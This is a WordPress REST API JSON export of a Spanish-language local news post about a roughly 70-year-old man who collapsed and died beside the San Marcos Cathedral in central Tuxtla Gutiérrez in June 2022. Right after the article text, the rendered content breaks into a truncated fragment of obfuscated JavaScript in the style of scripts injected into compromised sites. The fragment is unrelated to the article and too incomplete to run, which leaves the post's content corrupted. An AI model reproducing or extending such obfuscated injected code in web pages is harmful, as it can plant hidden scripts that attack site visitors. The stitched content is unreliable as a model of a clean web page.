{"id":3081,"date":"2022-06-21T20:54:55","date_gmt":"2022-06-21T20:54:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3081"},"modified":"2022-06-21T20:54:56","modified_gmt":"2022-06-21T20:54:56","slug":"muere-hombre-a-un-costado-de-la-catedral-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3081","title":{"rendered":"Muere hombre a un costado de la Catedral de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017-1024x682.jpg\" alt=\"\" class=\"wp-image-3082\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220621-WA0017.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>FOTO: Carlos L\u00f3pez. Agencia ReporteCiudadano, 21 de  junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Cerca del medio d\u00eda de este martes  un hombre perdi\u00f3 la vida luego de desvanecerse a un costado de la Catedral de San Marcos en pleno centro de Tuxtla Guti\u00e9rrez.Algunos testigos relataron que, el hombre de unos 70 a\u00f1os de edad que vest\u00eda una playera amarilla, pantal\u00f3n beige y tenis azules se sent\u00f3 en una de las jardineras y de manera repentina se desplom\u00f3. Los mismos vendedores de la zona marcaron a los n\u00fameros de emergencias, inmediatamente llegaron param\u00e9dicos del Cuerpo de Bomberos para realizar un chequeo. Elementos de la Polic\u00eda acordonaron el \u00e1rea, pues se dictamin\u00f3 que el hombre hab\u00eda muerto. Al lugar arribaron peritos de la FGE para realizar las diligencias correspondientes, levantar el cuerpo y trasladarlo al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. FOTO: Carlos L\u00f3pez. Agencia ReporteCiudadano, 21 de junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Cerca del medio d\u00eda de este martes un hombre perdi\u00f3 la vida luego de desvanecerse a un costado de la Catedral de San Marcos en pleno centro de Tuxtla Guti\u00e9rrez.Algunos testigos relataron que, el hombre de unos 70 a\u00f1os de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3082,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3081","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3081"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3081\/revisions"}],"predecessor-version":[{"id":3083,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3081\/revisions\/3083"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3082"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}